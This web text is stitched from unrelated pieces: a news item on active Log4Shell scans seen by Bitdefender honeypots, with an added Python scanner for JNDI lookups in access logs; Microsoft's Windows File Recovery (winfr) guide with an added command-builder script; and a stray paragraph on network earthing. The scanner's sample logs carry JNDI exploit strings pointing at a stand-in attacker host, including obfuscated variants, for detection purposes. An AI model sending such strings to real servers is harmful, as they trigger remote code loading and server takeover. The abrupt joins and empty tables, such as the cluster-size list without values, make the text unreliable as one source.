Bitdefender Honeypots Signal Active Log4Shell 0-Day Attacks Underway; Patch Immediately
Log4Shell is a 0-day vulnerability in the Log4j Java library that allows attackers to download and run scripts on targeted servers, leaving them open to complete remote control. After a user posted a proof-of-concept (PoC) on Twitter, Bitdefender’s honeypots started to register attacks using the PoC, underlining just how severe this vulnerability is.
Log4j is not just another Java library. It’s embedded in servers and services from all over the world, used by companies such as Apple, Amazon, Cloudflare, Steam, various Apache server types, ElasticSearch, and many others.
As 0-day vulnerabilities go, Log4Shell (CVE-2021-44228) has a 10/10 rating, which means that attackers can remotely exploit it without any input from the victim, and it doesn’t require high-level technical expertise to pull it off.
The Apache Software Foundation issued an emergency patch, and now Log4j 2.15.0 is available to everyone.
“JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default,” explain the developers in the release notes.
It’s difficult to estimate the massive impact Log4Shell will have because historically patches (even for high-severity threats) take time for everyone to apply, if ever. We commonly see attacks successfully executed using fixed vulnerabilities that are two or three years old.
Immediately after the Log4Shell PoC was released, adversaries started scanning the Internet, looking for vulnerable targets. Bitdefender honeypots are seeing attackers trying to compromise different web services. The total number of scans using Log4Shell has increased three-fold in a single day, meaning we are most likely just at the beginning. While most scans don’t have a particular target, around 20 percent of the attempts seem to search for vulnerable Apache Solr services.
When Bitdefender’s global honeypot network experiences a marked spike in activity, it usually means attackers are actively looking for ways to weaponize a newly discovered vulnerability as soon as possible. Most of the scans we are seeing now are coming from Russia-based IP addresses.
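As an added example (not code from Bitdefender’s post), the following Python script shows the kind of check a defender can run over web-server access logs to spot the lookup strings these scans carry, including the URL-encoded and nested-lookup variants that a naive string match misses. The log lines are constructed; the 203.0.113.0/24 sources and the attacker.invalid host are documentation and reserved names.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not honeypot data); the sources are
# documentation addresses and the lookup target is a reserved .invalid name.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:09:12:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Dec/2021:09:12:05 +0000] "GET /solr/admin/cores?action=${jndi:ldap://attacker.invalid/a} HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.12 - - [10/Dec/2021:09:12:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:l}dap://attacker.invalid/x}"
203.0.113.13 - - [10/Dec/2021:09:12:14 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.invalid%2Fz%7D HTTP/1.1" 200 612 "-" "Mozilla/5.0"
"""

# Nested lookups such as ${lower:j} or ${::-j} expand to a single character;
# collapse them before matching so that obfuscated variants are not missed.
_NESTED = re.compile(r"\$\{(?:lower|upper):([A-Za-z])\}|\$\{::-([^}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode and collapse nested lookups until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _NESTED.sub(lambda m: m.group(1) or m.group(2), unquote(text))
    return text


def find_jndi_lookups(line: str) -> list:
    """Return the JNDI schemes (ldap, rmi, dns, ...) referenced in one log line."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(line))]


def scan_log(text: str) -> list:
    """Return (line number, source IP, schemes) for every line carrying a lookup."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        schemes = find_jndi_lookups(line)
        if schemes:
            hits.append((lineno, line.split(" ", 1)[0], schemes))
    return hits


if __name__ == "__main__":
    for lineno, src, schemes in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {src} -> jndi lookup via {','.join(schemes)}")
```

A hit only tells you a lookup string was received, not that the application logged it with a vulnerable Log4j; treat it as a scan indicator and confirm exposure by checking the Log4j version on the host.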
Bitdefender recommends all companies using the Log4j library upgrade as soon as possible to the latest version. The traffic generated in the honeypots indicates that attackers know about the vulnerability and how widespread the library is. We believe we’re witnessing only the start of a very long campaign.
If you can’t locate a lost file from your backup, then you can use Windows File Recovery, which is a command line app available from the Microsoft Store. Use this app to try to recover lost files that have been deleted from your local storage device (including internal drives, external drives, and USB devices) and can’t be restored from the Recycle Bin. Recovery on cloud storage and network file shares is not supported.
If you want to increase your chances of recovering a file, minimize or avoid using your computer. In the Windows file system, the space used by a deleted file is marked as free space, which means the file data can still exist and be recovered. But any use of your computer can create files, which may over-write this free space at any time.
How to recover and restore lost files on Windows 10
Press the Windows key, enter Windows File Recovery in the search box, and then select Windows File Recovery.
When you are prompted to allow the app to make changes to your device, select Yes.
In the Command Prompt window, enter the command in the following format:
winfr source-drive: destination-drive: [/switches]
The source and destination drives must be different. When recovering from the operating system drive (often C:), use the /n <filter> and /y:<type(s)> switches to specify the user files or folder.
Microsoft automatically creates a recovery folder for you called Recovery_<date and time> on the destination drive.
There are three modes you can use to recover files: Default, Segment, and Signature.
Default mode examples
Recover a specific file from your C: drive to the recovery folder on an E: drive:
winfr C: E: /n \Users\<username>\Documents\QuarterlyStatement.docx
Recover jpeg and png photos from your Pictures folder to the recovery folder on an E: drive:
winfr C: E: /n \Users\<username>\Pictures\*.JPEG /n \Users\<username>\Pictures\*.PNG
Recover your Documents folder from your C: drive to the recovery folder on an E: drive:
winfr C: E: /n \Users\<username>\Documents\
Don’t forget the backslash (\) at the end of the folder.
Segment mode examples (/r)
Recover PDF and Word files from your C: drive to the recovery folder on an E: drive:
winfr C: E: /r /n *.pdf /n *.docx
Recover any file with the string “invoice” in the filename by using wildcard characters:
winfr C: E: /r /n *invoice*
Signature mode examples (/x)
When using signature mode, it’s helpful to first see the supported extension groups and corresponding file types:
winfr /#
Recover JPEG (jpg, jpeg, jpe, jif, jfif, jfi) and PNG photos from your C: drive to the recovery folder on an E: drive:
winfr C: E: /x /y:JPEG,PNG
Recover ZIP files (zip, docx, xlsx, pptx, and so on) from your C: drive to the recovery folder on an E: drive:
winfr C: E:\RecoveryTest /x /y:ZIP
When you are prompted for confirmation to continue, enter Y to start the recovery operation.
Depending on the size of your source drive, this may take a while.
To stop the recovery process, press Ctrl+C.
About modes and file systems
The following information can help you decide which file system you have and which mode to use.
There are several file systems supported by Windows that vary depending on the storage device or operating system. Recovering files from non-NTFS file systems is only supported in signature mode. To see which file system you have, right click a drive in File Explorer and select Properties.
File system | Examples
FAT and exFAT | SD cards, Flash or USB drives (< 4GB)
ReFS | Windows Server and Windows Pro for Workstations
NTFS | Computers (HDD, SSD), external hard drives, flash or USB drives (> 4GB)
Deciding which mode to use
Use the following table to help you decide which mode to use. If you’re not sure, start with the default mode.
File system | Circumstances | Recommended mode
NTFS | Deleted recently | Default
NTFS | Deleted a while ago | First try Segment, then Signature
NTFS | After formatting a disk | First try Segment, then Signature
NTFS | A corrupted disk | First try Segment, then Signature
FAT, exFAT, ReFS | Recovery file type is supported (see following table) | Signature
Signature mode extension groups and file types
The following table summarizes the extension groups and the supported file types for each group when you use the /y:<type(s)> switch:
The following table summarizes what each basic command line parameter and switch is used for.
Parameter or switch | Description
source-drive: | Specifies the storage device where the files were lost. Must be different from the destination-drive.
destination-drive: | Specifies the storage device and folder on which to put the recovered files. Must be different from the source-drive.
/r | Uses segment mode, which examines File Record Segments (FRS).
/n <filter> | Scans for a specific file by using a file name, file path, or wildcards. For example:
File name: /n myfile.docx
File path: /n /users/<username>/Documents/
Wildcard: /n myfile.* /n *.docx /n *<string>*
/x | Uses signature mode, which examines file types and works on all file systems.
/y:<type(s)> | Scans for files with specific file types. Separate multiple entries by using commas. For a list of extension groups and corresponding file types, see the table, “Signature mode extension groups and file types” in the section, “About modes and file systems”.
/# | Shows signature mode extension groups and corresponding file types in each group.
/? | Shows a quick summary of syntax and switches for general users.
/! | Shows a quick summary of syntax and switches for advanced users.
Frequently asked questions
Can you give some tips to help me use correct syntax?
Here are some suggestions:
Always use drive letters in the source and destination path, don’t forget the colon (:) after the drive letter, and make sure there is a space between the source and destination.
If a switch has a colon, such as /y:, don’t add a space between the colon and the rest of the value.
When you specify just a folder name, such as /n \Myfolder\, add a backslash (\) at the end of it.
If a file or folder name has spaces, surround it with quotes. For example: winfr C: E: /n "\Users\<username>\Documents\Quarterly Statement.docx"
To stop the recovery process, press Ctrl+C.
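The following Python helper is an added example, not Microsoft’s code: it assembles a winfr command line for the procedure and mode examples above while enforcing the syntax rules from this FAQ (drive letter with colon, different source and destination, trailing backslash on a bare folder, quotes around names with spaces, no space after /y:). Drive letters and the user name alice are placeholders.

```python
import re


def _filter_arg(path: str) -> str:
    """Format one /n value: add the trailing backslash a folder needs, quote spaces."""
    last = path.rstrip("\\").rsplit("\\", 1)[-1]
    if "." not in last and "*" not in last and not path.endswith("\\"):
        path += "\\"  # a bare folder name must end with a backslash
    return f'"{path}"' if " " in path else path


def winfr_command(source: str, destination: str, mode: str = "default",
                  filters=(), types=()) -> str:
    """Return the winfr command line for a recovery in the given mode.

    source: "C:"; destination: "E:" or "E:\\RecoveryTest";
    mode: "default", "segment" (/r) or "signature" (/x);
    filters: /n values for default and segment mode; types: /y: groups for signature mode.
    """
    if not re.fullmatch(r"[A-Za-z]:", source):
        raise ValueError("source must be a drive letter followed by a colon, e.g. C:")
    if not re.match(r"[A-Za-z]:", destination):
        raise ValueError("destination must start with a drive letter and a colon")
    if source[0].upper() == destination[0].upper():
        raise ValueError("source and destination cannot refer to the same partition")
    if mode not in ("default", "segment", "signature"):
        raise ValueError("mode must be default, segment or signature")

    parts = ["winfr", source, destination]
    if mode == "segment":
        parts.append("/r")
    if mode == "signature":
        if filters or not types:
            raise ValueError("signature mode uses /y:<type(s)>, not /n <filter>")
        parts += ["/x", "/y:" + ",".join(types)]  # no space after the colon
    else:
        if types:
            raise ValueError("/y: is only valid in signature mode")
        for f in filters:
            parts += ["/n", _filter_arg(f)]
    return " ".join(parts)


if __name__ == "__main__":
    print(winfr_command("C:", "E:", filters=[r"\Users\alice\Documents\Quarterly Statement.docx"]))
    print(winfr_command("C:", "E:", mode="segment", filters=["*.pdf", "*invoice*"]))
    print(winfr_command("C:", r"E:\RecoveryTest", mode="signature", types=["JPEG", "PNG"]))
```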
What does <username> mean in the command examples?
In the File Explorer address bar, enter C:\users to see a list of potential users on your computer. There may be several users on your computer, including you, the administrator, and the default account. When you see <username> in a file path, it is a placeholder for the current username on your computer.
Why am I getting this message: “Source and Destination cannot refer to the same physical partition?”
The source and destination drive or partition path should not be the same. If you only have one drive, use a USB or external hard drive as your destination path. Don’t create a partition after losing data, because this reduces the chance of a successful recovery.
Why does the recovery operation take so long?
Depending on the size of the disk, it may take some time to recover the file, especially if you are using signature mode.
Why are additional files recovered from my operating system drive?
Behind the scenes, Windows is constantly creating and deleting files. By default, Windows File Recovery filters out these files, but some slip through. To prevent this, use the /n <filter> switch in default and segment modes and the /y:<type(s)> switch in signature mode.
What is the $Recycle.Bin folder?
For default and segment modes, you may also see lost files recovered from the Recycle Bin (files either in the recycle bin or that were permanently deleted) with the name $files.xxx and stored in a folder called $RECYCLE.BIN.
What happens if the destination drive is full?
If you see the message “Destination disk is full, please free up space before resuming: (R)esume, (S)kip file, or (A)bort”, free up drive space on the destination drive, and then choose one of the options.
I was not able to recover the file, now what?
If you used default or segment mode, try again in signature mode if the file type is supported. It’s possible that the free space was over-written, especially on a solid state drive (SSD). If you need help, contact your administrator.
Command line syntax
The following table summarizes what each advanced switch is used for.
Switch | Description
/p:<folder> | Saves a log file of the recovery operation in a different location than the default location on the recovery drive (for example, D:\logfile).
/a | Overrides user prompts, which is useful in a script file.
/u | Recovers undeleted files, for example, from the Recycle Bin.
/k | Recovers system files.
/o:<a|n|b> | Specifies whether to always (a), never (n), or keep both (b) when choosing whether to overwrite a file. The default action is to prompt to overwrite.
/g | Recovers files without primary data streams.
/e | To keep your results manageable and focus on user files, some file types are filtered by default, but this switch removes that filter. For a complete list of these file types, see the information after this table.
/e:<extension> | Specifies which file types are filtered. For a complete list of these file types, see the information after this table.
/s:<sectors> | Specifies the number of sectors on the source device. To find sector information, use fsutil.
/b:<bytes> | Specifies the cluster size (allocation unit) on the source device.
/f:<sector> | Specifies the first sector on the source device to start the scan operation, for example, to bypass unusable sectors. To find sector information, use fsutil.
File extension filter list
The following file types are filtered from results by default. Use the /e switch to disable this filter or the /e:<extension> filter to specify file types not to filter.
As you use the Windows File Recovery app, it’s often helpful to understand what’s going on “under the hood” of a storage device.
The three modes of operation
The three modes work in the following way:
Default mode This mode uses the Master File Table (MFT) to locate lost files. Default mode works well when the MFT and file segments, also called File Record Segments (FRS), are present.
Segment mode This mode does not require the MFT but does require segments. Segments are summaries of file information that NTFS stores in the MFT such as name, date, size, type and the cluster/allocation unit index.
Signature mode This mode only requires that the data is present and searches for specific file types. It doesn’t work for small files. To recover a file on an external storage device, such as a USB drive, you can only use Signature mode.
How a storage device is organized
The bytes on a storage device are organized into sectors and clusters. A sector is the smallest addressable unit of storage on the device. A cluster is a group of sectors and is the smallest amount of disk space that can be allocated for a file. NTFS organizes disks based on cluster size, which is determined by the number of sectors in a cluster. On NTFS, clusters start at 0 and are numbered sequentially from the beginning of the partition as logical cluster numbers.
The default cluster size varies depending on the capacity of the storage device:
7 to 512 MB
513 to 1,024 MB
1,025 MB to 2 GB
2 GB to 2 TB
The NTFS file system
New Technology File System (NTFS) is the default file system in Windows. NTFS organizes files by using a well-defined structure to describe how files are stored, what information to include, and how to locate the files. A critical element is the Master File Table (MFT), which is a table made up of one row for each file and several columns of file attributes. This row is the File Record Segment (FRS). The MFT is like a table of contents for every file on the storage device. NTFS also keeps a backup of the MFT in case the original MFT becomes unusable.
Settings, such as read-only and archive, file creation and modification dates, and so on.
The name of the file including the MS-DOS short name.
The contents of the file if it’s small.
Information about the file allocation.
Additional attributes include file type, permissions, size, and file path.
Proper earthing or grounding of the key network infrastructure parts (catalysts) would ensure the reliability, availability and integrity of the functional operating ICT business support that the LAN and wireless network provide to every layer of the OSI model, from infrastructure to system to application and to user presentation.
Sadly, it is predominantly small and medium-size businesses that suffer by not getting it right the first time, largely because of the misconception that money is saved by trusting unqualified, cheaper IT consultants and practitioners; they then pay dearly in starting over, data loss, lost operating time and, in some cases, catastrophic failure.
They also fail to realize the importance of having a long-term ICT strategy and business plan that is flexible and supports the business owner’s development vision and agenda.